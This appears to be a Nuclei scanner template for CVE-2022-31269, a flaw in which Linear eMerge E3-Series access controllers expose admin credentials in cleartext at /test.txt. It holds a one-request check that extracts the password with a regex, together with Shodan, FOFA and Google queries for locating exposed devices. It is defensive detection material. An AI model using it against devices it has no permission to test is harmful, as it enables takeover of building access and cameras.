id: CVE-2022-31269 info: name: Linear eMerge E3-Series - Information Disclosure author: For3stCo1d severity: high description: | Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information. impact: | An attacker can exploit this vulnerability to gain sensitive information from the device. remediation: | Apply the latest firmware update provided by the vendor to fix the vulnerability. reference: - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html - https://www.nortekcontrol.com/access-control/ - https://eg.linkedin.com/in/omar-1-hashem - https://nvd.nist.gov/vuln/detail/CVE-2022-31269 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 epss-score: 0.00284 epss-percentile: 0.68595 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"Linear eMerge" fofa-query: title="emerge" google-query: intitle:"linear emerge" tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol http: - method: GET path: - "{{BaseURL}}/test.txt" matchers-condition: and matchers: - type: word words: - "ID=" - "Password=" condition: and - type: word part: header words: - text/plain - type: status status: - 200 extractors: - type: regex regex: - Password='(.+?)' # digest: 4a0a00473045022100dfa874c9fcc0869f067c98760eca4e1d0663d7543862826e233a53d3eba4a17502201d2069ee57f63c3a10df5dce882a57b4b7a8d16215910078bdc998bde72b6728:922c64590222798bb761d5b6d8e72950